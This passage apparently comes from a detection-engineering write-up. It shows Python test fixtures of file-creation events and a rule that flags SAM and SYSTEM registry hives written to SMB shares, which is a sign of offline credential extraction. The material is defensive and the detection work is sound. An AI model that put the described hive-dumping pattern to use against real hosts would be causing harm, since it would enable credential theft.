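    FileEvent("FS01", 1060.0, "creation", 4, USER, r"C:\Shares\public\system.hive", 16_777_216, HIVE_HEADER),
    FileEvent("FS01", 1100.0, "creation", 4, USER, r"C:\Shares\public\notes.txt", 49_152, b"Hello"),          # not a hive
    FileEvent("FS01", 1200.0, "creation", 4, "S-1-5-18", r"C:\Shares\public\sam.hive", 49_152, HIVE_HEADER),  # built-in SYSTEM SID, not a remote user
    FileEvent("WS07", 1300.0, "creation", 5120, USER, r"C:\Users\alice\sam.hive", 49_152, HIVE_HEADER),       # local process, not the SMB server
    FileEvent("FS01", 1400.0, "creation", 4, AAD_USER, r"C:\Shares\backup\sam.hive", 1_024, HIVE_HEADER),     # below the size threshold
    FileEvent("FS01", 5000.0, "creation", 4, AAD_USER, r"C:\Shares\backup\sam.hive", 49_152, HIVE_HEADER),    # matches, but no SYSTEM hive follows
]

if __name__ == "__main__":
    print([e.path for e in SAMPLE_EVENTS if is_hive_write_via_smb(e)])
    print(correlate(SAMPLE_EVENTS))
```

Three single events match the rule conditions, but only the S-1-5-21 account on FS01 shows the SAM plus SYSTEM pair that makes offline credential extraction possible; that pair is the alert to escalate first.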